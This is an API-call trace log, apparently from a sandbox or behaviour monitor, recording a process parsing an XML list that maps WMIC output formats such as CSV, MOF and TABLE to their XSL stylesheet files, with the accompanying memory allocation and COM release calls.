[0401.227] SysStringLen (param_1="HTABLE") returned 0x6
[0401.227] malloc (_Size=0x30) returned 0x208200
[0401.227] IUnknown:Release (This=0x213bd50) returned 0x0
[0401.227] IUnknown:Release (This=0x21378d0) returned 0x0
[0401.228] IUnknown:Release (This=0x213a280) returned 0x0
[0401.228] IXMLDOMNodeList:get_item (in: This=0x2139cc0, index=6, listItem=0x16f590 | out: listItem=0x16f590*=0x213bd50) returned 0x0
[0401.228] IXMLDOMNode:get_text (in: This=0x213bd50, text=0x16f5a0 | out: text=0x16f5a0*="xml.xsl") returned 0x0
[0401.228] IXMLDOMNode:get_attributes (in: This=0x213bd50, attributeMap=0x16f598 | out: attributeMap=0x16f598*=0x21378d0) returned 0x0
[0401.228] malloc (_Size=0x18) returned 0x2091a0
[0401.228] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21378d0, name="KEYWORD", namedItem=0x16f5a8 | out: namedItem=0x16f5a8*=0x213a280) returned 0x0
[0401.229] free (_Block=0x2091a0)
[0401.229] IXMLDOMNode:get_nodeValue (in: This=0x213a280, value=0x16f5e0 | out: value=0x16f5e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XML", varVal2=0x80070001c)) returned 0x0
[0401.229] malloc (_Size=0x18) returned 0x2091a0
[0401.229] malloc (_Size=0x18) returned 0x2091c0
[0401.229] SysStringLen (param_1="XML") returned 0x3
[0401.229] SysStringLen (param_1="TABLE") returned 0x5
[0401.229] SysStringLen (param_1="XML") returned 0x3
[0401.229] SysStringLen (param_1="VALUE") returned 0x5
[0401.229] SysStringLen (param_1="VALUE") returned 0x5
[0401.229] SysStringLen (param_1="XML") returned 0x3
[0401.230] malloc (_Size=0x30) returned 0x208240
[0401.230] IUnknown:Release (This=0x213bd50) returned 0x0
[0401.230] IUnknown:Release (This=0x21378d0) returned 0x0
[0401.230] IUnknown:Release (This=0x213a280) returned 0x0
[0401.230] IXMLDOMNodeList:get_item (in: This=0x2139cc0, index=7, listItem=0x16f590 | out: listItem=0x16f590*=0x213bd50) returned 0x0
[0401.230] IXMLDOMNode:get_text (in: This=0x213bd50, text=0x16f5a0 | out: text=0x16f5a0*="mof.xsl") returned 0x0
[0401.230] IXMLDOMNode:get_attributes (in: This=0x213bd50, attributeMap=0x16f598 | out: attributeMap=0x16f598*=0x21378d0) returned 0x0
[0401.230] malloc (_Size=0x18) returned 0x2091e0
[0401.230] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21378d0, name="KEYWORD", namedItem=0x16f5a8 | out: namedItem=0x16f5a8*=0x213a280) returned 0x0
[0401.231] free (_Block=0x2091e0)
[0401.231] IXMLDOMNode:get_nodeValue (in: This=0x213a280, value=0x16f5e0 | out: value=0x16f5e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MOF", varVal2=0x80070001c)) returned 0x0
[0401.231] malloc (_Size=0x18) returned 0x2091e0
[0401.231] malloc (_Size=0x18) returned 0x209200
[0401.231] SysStringLen (param_1="MOF") returned 0x3
[0401.231] SysStringLen (param_1="TABLE") returned 0x5
[0401.231] SysStringLen (param_1="MOF") returned 0x3
[0401.231] SysStringLen (param_1="LIST") returned 0x4
[0401.231] SysStringLen (param_1="MOF") returned 0x3
[0401.231] SysStringLen (param_1="RAWXML") returned 0x6
[0401.231] SysStringLen (param_1="LIST") returned 0x4
[0401.231] SysStringLen (param_1="MOF") returned 0x3
[0401.231] malloc (_Size=0x30) returned 0x208280
[0401.232] IUnknown:Release (This=0x213bd50) returned 0x0
[0401.232] IUnknown:Release (This=0x21378d0) returned 0x0
[0401.232] IUnknown:Release (This=0x213a280) returned 0x0
[0401.232] IXMLDOMNodeList:get_item (in: This=0x2139cc0, index=8, listItem=0x16f590 | out: listItem=0x16f590*=0x213bd50) returned 0x0
[0401.232] IXMLDOMNode:get_text (in: This=0x213bd50, text=0x16f5a0 | out: text=0x16f5a0*="csv.xsl") returned 0x0
[0401.232] IXMLDOMNode:get_attributes (in: This=0x213bd50, attributeMap=0x16f598 | out: attributeMap=0x16f598*=0x21378d0) returned 0x0
[0401.232] malloc (_Size=0x18) returned 0x209220
[0401.232] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21378d0, name="KEYWORD", namedItem=0x16f5a8 | out: namedItem=0x16f5a8*=0x213a280) returned 0x0
[0401.233] free (_Block=0x209220)
[0401.233] IXMLDOMNode:get_nodeValue (in: This=0x213a280, value=0x16f5e0 | out: value=0x16f5e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CSV", varVal2=0x80070001c)) returned 0x0
[0401.233] malloc (_Size=0x18) returned 0x209220
[0401.233] malloc (_Size=0x18) returned 0x209240
[0401.233] SysStringLen (param_1="CSV") returned 0x3
[0401.233] SysStringLen (param_1="TABLE") returned 0x5
[0401.233] SysStringLen (param_1="CSV") returned 0x3
[0401.233] SysStringLen (param_1="LIST") returned 0x4
[0401.233] SysStringLen (param_1="CSV") returned 0x3
[0401.233] SysStringLen (param_1="HTABLE") returned 0x6
[0401.234] SysStringLen (param_1="CSV") returned 0x3
[0401.234] SysStringLen (param_1="HFORM") returned 0x5
[0401.234] malloc (_Size=0x30) returned 0x2082c0
[0401.234] IUnknown:Release (This=0x213bd50) returned 0x0
[0401.234] IUnknown:Release (This=0x21378d0) returned 0x0
[0401.234] IUnknown:Release (This=0x213a280) returned 0x0
[0401.234] IXMLDOMNodeList:get_item (in: This=0x2139cc0, index=9, listItem=0x16f590 | out: listItem=0x16f590*=0x213bd50) returned 0x0
[0401.234] IXMLDOMNode:get_text (in: This=0x213bd50, text=0x16f5a0 | out: text=0x16f5a0*="texttable.xsl") returned 0x0
[0401.234] IXMLDOMNode:get_attributes (in: This=0x213bd50, attributeMap=0x16f598 | out: attributeMap=0x16f598*=0x21378d0) returned 0x0
[0401.234] malloc (_Size=0x18) returned 0x209260
[0401.235] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21378d0, name="KEYWORD", namedItem=0x16f5a8 | out: namedItem=0x16f5a8*=0x213a280) returned 0x0
[0401.235] free (_Block=0x209260)
[0401.235] IXMLDOMNode:get_nodeValue (in: This=0x213a280, value=0x16f5e0 | out: value=0x16f5e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys.xsl", varVal2=0x80070001c)) returned 0x0
[0401.235] malloc (_Size=0x18) returned 0x209260
[0401.235] malloc (_Size=0x18) returned 0x209280
[0401.235] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0401.235] SysStringLen (param_1="TABLE") returned 0x5
[0401.235] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0401.236] SysStringLen (param_1="VALUE") returned 0x5
[0401.236] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0401.236] SysStringLen (param_1="XML") returned 0x3
[0401.236] SysStringLen (param_1="XML") returned 0x3
[0401.236] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0401.236] malloc (_Size=0x30) returned 0x208300
[0401.236] IUnknown:Release (This=0x213bd50) returned 0x0
[0401.236] IUnknown:Release (This=0x21378d0) returned 0x0
[0401.236] IUnknown:Release (This=0x213a280) returned 0x0
[0401.236] IXMLDOMNodeList:get_item (in: This=0x2139cc0, index=10, listItem=0x16f590 | out: listItem=0x16f590*=0x213bd50) returned 0x0
[0401.236] IXMLDOMNode:get_text (in: This=0x213bd50, text=0x16f5a0 | out: text=0x16f5a0*="texttable.xsl") returned 0x0
[0401.237] IXMLDOMNode:get_attributes (in: This=0x213bd50, attributeMap=0x16f598 | out: attributeMap=0x16f598*=0x21378d0) returned 0x0
[0401.237] malloc (_Size=0x18) returned 0x2092a0
[0401.237] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21378d0, name="KEYWORD", namedItem=0x16f5a8 | out: namedItem=0x16f5a8*=0x213a280) returned 0x0
[0401.237] free (_Block=0x2092a0)
[0401.237] IXMLDOMNode:get_nodeValue (in: This=0x213a280, value=0x16f5e0 | out: value=0x16f5e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys", varVal2=0x80070001c)) returned 0x0
[0401.237] malloc (_Size=0x18) returned 0x2092a0
[0401.237] malloc (_Size=0x18) returned 0x2092c0
[0401.238] SysStringLen (param_1="texttablewsys") returned 0xd
[0401.238] SysStringLen (param_1="TABLE") returned 0x5
[0401.238] SysStringLen (param_1="texttablewsys") returned 0xd
[0401.238] SysStringLen (param_1="XML") returned 0x3
[0401.238] SysStringLen (param_1="texttablewsys") returned 0xd
[0401.238] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0401.238] SysStringLen (param_1="XML") returned 0x3
[0401.238] SysStringLen (param_1="texttablewsys") returned 0xd
[0401.238] malloc (_Size=0x30) returned 0x208340
[0401.238] IUnknown:Release (This=0x213bd50) returned 0x0
[0401.238] IUnknown:Release (This=0x21378d0) returned 0x0
[0401.238] IUnknown:Release (This=0x213a280) returned 0x0
[0401.239] IXMLDOMNodeList:get_item (in: This=0x2139cc0, index=11, listItem=0x16f590 | out: listItem=0x16f590*=0x213bd50) returned 0x0
[0401.239] IXMLDOMNode:get_text (in: This=0x213bd50, text=0x16f5a0 | out: text=0x16f5a0*="texttable.xsl") returned 0x0
[0401.239] IXMLDOMNode:get_attributes (in: This=0x213bd50, attributeMap=0x16f598 | out: attributeMap=0x16f598*=0x21378d0) returned 0x0
[0401.239] malloc (_Size=0x18) returned 0x2092e0
[0401.239] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21378d0, name="KEYWORD", namedItem=0x16f5a8 | out: namedItem=0x16f5a8*=0x213a280) returned 0x0
[0401.239] free (_Block=0x2092e0)
[0401.239] IXMLDOMNode:get_nodeValue (in: This=0x213a280, value=0x16f5e0 | out: value=0x16f5e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat.xsl", varVal2=0x80070001c)) returned 0x0
[0401.239] malloc (_Size=0x18) returned 0x2092e0
[0401.240] malloc (_Size=0x18) returned 0x209300
[0401.240] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
[0401.240] SysStringLen (param_1="TABLE") returned 0x5
[0401.240] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
[0401.240] SysStringLen (param_1="XML") returned 0x3
[0401.240] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
[0401.240] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0401.240] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0401.240] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
[0401.240] malloc (_Size=0x30) returned 0x208380
[0401.240] IUnknown:Release (This=0x213bd50) returned 0x0
[0401.240] IUnknown:Release (This=0x21378d0) returned 0x0
[0401.240] IUnknown:Release (This=0x213a280) returned 0x0
[0401.241] IXMLDOMNodeList:get_item (in: This=0x2139cc0, index=12, listItem=0x16f590 | out: listItem=0x16f590*=0x213bd50) returned 0x0
[0401.241] IXMLDOMNode:get_text (in: This=0x213bd50, text=0x16f5a0 | out: text=0x16f5a0*="texttable.xsl") returned 0x0
[0401.241] IXMLDOMNode:get_attributes (in: This=0x213bd50, attributeMap=0x16f598 | out: attributeMap=0x16f598*=0x21378d0) returned 0x0
[0401.241] malloc (_Size=0x18) returned 0x209320
[0401.241] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21378d0, name="KEYWORD", namedItem=0x16f5a8 | out: namedItem=0x16f5a8*=0x213a280) returned 0x0
[0401.241] free (_Block=0x209320)
[0401.241] IXMLDOMNode:get_nodeValue (in: This=0x213a280, value=0x16f5e0 | out: value=0x16f5e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat", varVal2=0x80070001c)) returned 0x0
[0401.241] malloc (_Size=0x18) returned 0x209320
[0401.242] malloc (_Size=0x18) returned 0x209340
[0401.242] SysStringLen (param_1="wmiclitableformat") returned 0x11
[0401.242] SysStringLen (param_1="TABLE") returned 0x5
[0401.242] SysStringLen (param_1="wmiclitableformat") returned 0x11
[0401.242] SysStringLen (param_1="XML") returned 0x3
[0401.242] SysStringLen (param_1="wmiclitableformat") returned 0x11
[0401.242] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0401.242] SysStringLen (param_1="wmiclitableformat") returned 0x11
[0401.242] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
[0401.242] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0401.242] SysStringLen (param_1="wmiclitableformat") returned 0x11
[0401.242] malloc (_Size=0x30) returned 0x2083c0
[0401.242] IUnknown:Release (This=0x213bd50) returned 0x0
[0401.243] IUnknown:Release (This=0x21378d0) returned 0x0
[0401.243] IUnknown:Release (This=0x213a280) returned 0x0
[0401.243] IXMLDOMNodeList:get_item (in: This=0x2139cc0, index=13, listItem=0x16f590 | out: listItem=0x16f590*=0x213bd50) returned 0x0
[0401.243] IXMLDOMNode:get_text (in: This=0x213bd50, text=0x16f5a0 | out: text=0x16f5a0*="texttable.xsl") returned 0x0
[0401.243] IXMLDOMNode:get_attributes (in: This=0x213bd50, attributeMap=0x16f598 | out: attributeMap=0x16f598*=0x21378d0) returned 0x0
[0401.243] malloc (_Size=0x18) returned 0x209360
[0401.243] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21378d0, name="KEYWORD", namedItem=0x16f5a8 | out: namedItem=0x16f5a8*=0x213a280) returned 0x0
[0401.243] free (_Block=0x209360)
[0401.243] IXMLDOMNode:get_nodeValue (in: This=0x213a280, value=0x16f5e0 | out: value=0x16f5e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys.xsl", varVal2=0x80070001c)) returned 0x0
[0401.243] malloc (_Size=0x18) returned 0x209360
[0401.244] malloc (_Size=0x18) returned 0x209380
[0401.244] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
[0401.244] SysStringLen (param_1="TABLE") returned 0x5
[0401.244] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
[0401.244] SysStringLen (param_1="XML") returned 0x3
[0401.245] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
[0401.245] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0401.245] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
[0401.245] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
[0401.245] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
[0401.245] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
[0401.245] malloc (_Size=0x30) returned 0x208400
[0401.245] IUnknown:Release (This=0x213bd50) returned 0x0
[0401.245] IUnknown:Release (This=0x21378d0) returned 0x0
[0401.245] IUnknown:Release (This=0x213a280) returned 0x0
[0401.245] IXMLDOMNodeList:get_item (in: This=0x2139cc0, index=14, listItem=0x16f590 | out: listItem=0x16f590*=0x213bd50) returned 0x0
[0401.246] IXMLDOMNode:get_text (in: This=0x213bd50, text=0x16f5a0 | out: text=0x16f5a0*="texttable.xsl") returned 0x0
[0401.246] IXMLDOMNode:get_attributes (in: This=0x213bd50, attributeMap=0x16f598 | out: attributeMap=0x16f598*=0x21378d0) returned 0x0
[0401.246] malloc (_Size=0x18) returned 0x2093a0
[0401.246] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21378d0, name="KEYWORD", namedItem=0x16f5a8 | out: namedItem=0x16f5a8*=0x213a280) returned 0x0
[0401.246] free (_Block=0x2093a0)
[0401.246] IXMLDOMNode:get_nodeValue (in: This=0x213a280, value=0x16f5e0 | out: value=0x16f5e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys", varVal2=0x80070001c)) returned 0x0
[0401.246] malloc (_Size=0x18) returned 0x2093a0
[0401.246] malloc (_Size=0x18) returned 0x2093c0
[0401.246] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16
[0401.247] SysStringLen (param_1="TABLE") returned 0x5
[0401.247] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16
[0401.247] SysStringLen (param_1="XML") returned 0x3
[0401.247] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16
[0401.247] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0401.247] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16
[0401.247] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
[0401.247] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16
[0401.247] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
[0401.247] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
[0401.247] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16
[0401.247] malloc (_Size=0x30) returned 0x208440
[0401.247] IUnknown:Release (This=0x213bd50) returned 0x0
[0401.247] IUnknown:Release (This=0x21378d0) returned 0x0
[0401.247] IUnknown:Release (This=0x213a280) returned 0x0
[0401.248] IXMLDOMNodeList:get_item (in: This=0x2139cc0, index=15, listItem=0x16f590 | out: listItem=0x16f590*=0x213bd50) returned 0x0
[0401.248] IXMLDOMNode:get_text (in: This=0x213bd50, text=0x16f5a0 | out: text=0x16f5a0*="htable.xsl") returned 0x0
[0401.248] IXMLDOMNode:get_attributes (in: This=0x213bd50, attributeMap=0x16f598 | out: attributeMap=0x16f598*=0x21378d0) returned 0x0
[0401.248] malloc (_Size=0x18) returned 0x2093e0
[0401.248] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21378d0, name="KEYWORD", namedItem=0x16f5a8 | out: namedItem=0x16f5a8*=0x213a280) returned 0x0
[0401.248] free (_Block=0x2093e0)
[0401.248] IXMLDOMNode:get_nodeValue (in: This=0x213a280, value=0x16f5e0 | out: value=0x16f5e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby.xsl", varVal2=0x80070001c)) returned 0x0
[0401.248] malloc (_Size=0x18) returned 0x2093e0
[0401.248] malloc (_Size=0x18) returned 0x209400
[0401.249] SysStringLen (param_1="htable-sortby.xsl") returned 0x11
[0401.249] SysStringLen (param_1="TABLE") returned 0x5
[0401.249] SysStringLen (param_1="htable-sortby.xsl") returned 0x11
[0401.249] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0401.249] SysStringLen (param_1="htable-sortby.xsl") returned 0x11
[0401.249] SysStringLen (param_1="XML") returned 0x3
[0401.249] SysStringLen (param_1="htable-sortby.xsl") returned 0x11
[0401.249] SysStringLen (param_1="texttablewsys") returned 0xd
[0401.249] SysStringLen (param_1="XML") returned 0x3
[0401.249] SysStringLen (param_1="htable-sortby.xsl") returned 0x11
[0401.249] malloc (_Size=0x30) returned 0x208480
[0401.249] IUnknown:Release (This=0x213bd50) returned 0x0
[0401.249] IUnknown:Release (This=0x21378d0) returned 0x0
[0401.250] IUnknown:Release (This=0x213a280) returned 0x0
[0401.250] IXMLDOMNodeList:get_item (in: This=0x2139cc0, index=16, listItem=0x16f590 | out: listItem=0x16f590*=0x213bd50) returned 0x0
[0401.250] IXMLDOMNode:get_text (in: This=0x213bd50, text=0x16f5a0 | out: text=0x16f5a0*="htable.xsl") returned 0x0
[0401.250] IXMLDOMNode:get_attributes (in: This=0x213bd50, attributeMap=0x16f598 | out: attributeMap=0x16f598*=0x21378d0) returned 0x0
[0401.250] malloc (_Size=0x18) returned 0x209420
[0401.250] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21378d0, name="KEYWORD", namedItem=0x16f5a8 | out: namedItem=0x16f5a8*=0x213a280) returned 0x0
[0401.250] free (_Block=0x209420)
[0401.250] IXMLDOMNode:get_nodeValue (in: This=0x213a280, value=0x16f5e0 | out: value=0x16f5e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby", varVal2=0x80070001c)) returned 0x0
[0401.250] malloc (_Size=0x18) returned 0x209420
[0401.250] malloc (_Size=0x18) returned 0x209440
[0401.251] SysStringLen (param_1="htable-sortby") returned 0xd
[0401.251] SysStringLen (param_1="TABLE") returned 0x5
[0401.251] SysStringLen (param_1="htable-sortby") returned 0xd
[0401.251] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0401.251] SysStringLen (param_1="htable-sortby") returned 0xd
[0401.251] SysStringLen (param_1="XML") returned 0x3
[0401.251] SysStringLen (param_1="htable-sortby") returned 0xd
[0401.251] SysStringLen (param_1="texttablewsys") returned 0xd
[0401.251] SysStringLen (param_1="htable-sortby") returned 0xd
[0401.251] SysStringLen (param_1="htable-sortby.xsl") returned 0x11
[0401.251] SysStringLen (param_1="XML") returned 0x3
[0401.251] SysStringLen (param_1="htable-sortby") returned 0xd
[0401.251] malloc (_Size=0x30) returned 0x2084c0
[0401.251] IUnknown:Release (This=0x213bd50) returned 0x0
[0401.252] IUnknown:Release (This=0x21378d0) returned 0x0
[0401.252] IUnknown:Release (This=0x213a280) returned 0x0
[0401.252] IXMLDOMNodeList:get_item (in: This=0x2139cc0, index=17, listItem=0x16f590 | out: listItem=0x16f590*=0x213bd50) returned 0x0
[0401.252] IXMLDOMNode:get_text (in: This=0x213bd50, text=0x16f5a0 | out: text=0x16f5a0*="mof.xsl") returned 0x0
[0401.252] IXMLDOMNode:get_attributes (in: This=0x213bd50, attributeMap=0x16f598 | out: attributeMap=0x16f598*=0x21378d0) returned 0x0
[0401.252] malloc (_Size=0x18) returned 0x209460
[0401.252] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21378d0, name="KEYWORD", namedItem=0x16f5a8 | out: namedItem=0x16f5a8*=0x213a280) returned 0x0
[0401.252] free (_Block=0x209460)
[0401.252] IXMLDOMNode:get_nodeValue (in: This=0x213a280, value=0x16f5e0 | out: value=0x16f5e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat.xsl", varVal2=0x80070001c)) returned 0x0
[0401.252] malloc (_Size=0x18) returned 0x209460
[0401.252] malloc (_Size=0x18) returned 0x209480
[0401.253] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13
[0401.253] SysStringLen (param_1="TABLE") returned 0x5
[0401.253] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13
[0401.253] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0401.253] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13
[0401.253] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
[0401.253] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13
[0401.253] SysStringLen (param_1="wmiclitableformat") returned 0x11
[0401.253] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0401.253] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13
[0401.253] malloc (_Size=0x30) returned 0x208500
[0401.253] IUnknown:Release (This=0x213bd50) returned 0x0
[0401.253] IUnknown:Release (This=0x21378d0) returned 0x0
[0401.254] IUnknown:Release (This=0x213a280) returned 0x0
[0401.254] IXMLDOMNodeList:get_item (in: This=0x2139cc0, index=18, listItem=0x16f590 | out: listItem=0x16f590*=0x213bd50) returned 0x0
[0401.254] IXMLDOMNode:get_text (in: This=0x213bd50, text=0x16f5a0 | out: text=0x16f5a0*="mof.xsl") returned 0x0
[0401.254] IXMLDOMNode:get_attributes (in: This=0x213bd50, attributeMap=0x16f598 | out: attributeMap=0x16f598*=0x21378d0) returned 0x0
[0401.254] malloc (_Size=0x18) returned 0x2094a0
[0401.254] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21378d0, name="KEYWORD", namedItem=0x16f5a8 | out: namedItem=0x16f5a8*=0x213a280) returned 0x0
[0401.254] free (_Block=0x2094a0)
[0401.254] IXMLDOMNode:get_nodeValue (in: This=0x213a280, value=0x16f5e0 | out: value=0x16f5e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat", varVal2=0x80070001c)) returned 0x0
[0401.254] malloc (_Size=0x18) returned 0x2094a0
[0401.254] malloc (_Size=0x18) returned 0x2094c0
[0401.255] SysStringLen (param_1="wmiclimofformat") returned 0xf
[0401.255] SysStringLen (param_1="TABLE") returned 0x5
[0401.255] SysStringLen (param_1="wmiclimofformat") returned 0xf
[0401.255] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0401.255] SysStringLen (param_1="wmiclimofformat") returned 0xf
[0401.255] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
[0401.255] SysStringLen (param_1="wmiclimofformat") returned 0xf
[0401.255] SysStringLen (param_1="wmiclitableformat") returned 0x11
[0401.255] SysStringLen (param_1="wmiclimofformat") returned 0xf
[0401.255] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13
[0401.255] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0401.255] SysStringLen (param_1="wmiclimofformat") returned 0xf
[0401.255] malloc (_Size=0x30) returned 0x208540
[0401.255] IUnknown:Release (This=0x213bd50) returned 0x0
[0401.256] IUnknown:Release (This=0x21378d0) returned 0x0
[0401.256] IUnknown:Release (This=0x213a280) returned 0x0
[0401.256] IXMLDOMNodeList:get_item (in: This=0x2139cc0, index=19, listItem=0x16f590 | out: listItem=0x16f590*=0x213bd50) returned 0x0
[0401.256] IXMLDOMNode:get_text (in: This=0x213bd50, text=0x16f5a0 | out: text=0x16f5a0*="textvaluelist.xsl") returned 0x0
[0401.256] IXMLDOMNode:get_attributes (in: This=0x213bd50, attributeMap=0x16f598 | out: attributeMap=0x16f598*=0x21378d0) returned 0x0
[0401.256] malloc (_Size=0x18) returned 0x2094e0
[0401.256] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21378d0, name="KEYWORD", namedItem=0x16f5a8 | out: namedItem=0x16f5a8*=0x213a280) returned 0x0
[0401.256] free (_Block=0x2094e0)
[0401.256] IXMLDOMNode:get_nodeValue (in: This=0x213a280, value=0x16f5e0 | out: value=0x16f5e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat.xsl", varVal2=0x80070001c)) returned 0x0
[0401.257] malloc (_Size=0x18) returned 0x2094e0
[0401.257] malloc (_Size=0x18) returned 0x209500
[0401.257] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15
[0401.257] SysStringLen (param_1="TABLE") returned 0x5
[0401.257] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15
[0401.257] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0401.257] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15
[0401.257] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
[0401.257] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15
[0401.257] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
[0401.257] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
[0401.257] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15
[0401.257] malloc (_Size=0x30) returned 0x208580
[0401.258] IUnknown:Release (This=0x213bd50) returned 0x0
[0401.258] IUnknown:Release (This=0x21378d0) returned 0x0
[0401.258] IUnknown:Release (This=0x213a280) returned 0x0
[0401.258] IXMLDOMNodeList:get_item (in: This=0x2139cc0, index=20, listItem=0x16f590 | out: listItem=0x16f590*=0x213bd50) returned 0x0
[0401.258] IXMLDOMNode:get_text (in: This=0x213bd50, text=0x16f5a0 | out: text=0x16f5a0*="textvaluelist.xsl") returned 0x0
[0401.258] IXMLDOMNode:get_attributes (in: This=0x213bd50, attributeMap=0x16f598 | out: attributeMap=0x16f598*=0x21378d0) returned 0x0
[0401.258] malloc (_Size=0x18) returned 0x209520
[0401.258] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21378d0, name="KEYWORD", namedItem=0x16f5a8 | out: namedItem=0x16f5a8*=0x213a280) returned 0x0
[0401.258] free (_Block=0x209520)
[0401.258] IXMLDOMNode:get_nodeValue (in: This=0x213a280, value=0x16f5e0 | out: value=0x16f5e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat", varVal2=0x80070001c)) returned 0x0
[0401.259] malloc (_Size=0x18) returned 0x209520
[0401.259] malloc (_Size=0x18) returned 0x209540
[0401.259] SysStringLen (param_1="wmiclivalueformat") returned 0x11
[0401.259] SysStringLen (param_1="TABLE") returned 0x5
[0401.259] SysStringLen (param_1="wmiclivalueformat") returned 0x11
[0401.259] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0401.259] SysStringLen (param_1="wmiclivalueformat") returned 0x11
[0401.259] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
[0401.259] SysStringLen (param_1="wmiclivalueformat") returned 0x11
[0401.259] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
[0401.259] SysStringLen (param_1="wmiclivalueformat") returned 0x11
[0401.259] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15
[0401.260] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
[0401.260] SysStringLen (param_1="wmiclivalueformat") returned 0x11
[0401.260] malloc (_Size=0x30) returned 0x2085c0
[0401.260] IUnknown:Release (This=0x213bd50) returned 0x0
[0401.260] IUnknown:Release (This=0x21378d0) returned 0x0
[0401.260] IUnknown:Release (This=0x213a280) returned 0x0
[0401.260] IUnknown:Release (This=0x2139cc0) returned 0x0
[0401.260] FreeThreadedDOMDocument:IUnknown:Release (This=0x213bc50) returned 0x1
[0401.260] FreeThreadedDOMDocument:IUnknown:Release (This=0x21371d0) returned 0x0
[0401.260] free (_Block=0x209040)
